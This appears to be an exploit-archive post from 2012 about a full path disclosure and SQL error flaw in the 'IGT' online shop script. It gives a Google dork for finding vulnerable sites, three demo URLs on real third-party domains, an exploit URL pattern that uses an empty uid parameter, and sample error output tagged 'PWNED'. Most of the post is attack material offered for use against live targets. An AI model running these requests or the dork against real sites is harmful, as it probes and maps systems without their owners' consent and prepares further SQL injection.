FPD IGT SQL ERROR

1. # Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
2. # Date: 24/02/2012
3. # Author: MaztoR
4. # Vendor or Software Link: http://www.igt.com.hk
5. # Version: ALL
6. # Category: webapps Shop
7. # Google dork: inurl:company_index.php
8. # Tested on: Linux
9.  
10. -----------------
11. DEMO
12. -----------------
13. http://colate20101022.tradinghand.com/company_index.php?id=1602&file=home&prod=prod&uid=
14. http://www.tiendaguasu.com/company_index.php?id=&file=home&prod=&uid=
15. http://www.szdigo.supplier-buy.com/company_index.php?id=2656&file=home&prod=sell&uid=
16. ----------------
17. Vulnerability
18. ----------------
19.  
20. Exploit:
21. ======================
22.  
23. http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]
24.  
25. ======================
26. Example:
27. ======================
28.  
29. http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=
30.  
31. Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3
32.  
33. Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]
34.  
35.  
36.  
37. ----------------------------------
38. Blog: maztor.blogspot.com
39. Twitter: @Mazt0r
40. ----------------------------------
41. Greetz: HielaSangre - Linuxfer - SunPlace - xDarkStonex - SeguridadBlanca - rbot
42. ALL USERS #RE - DDLR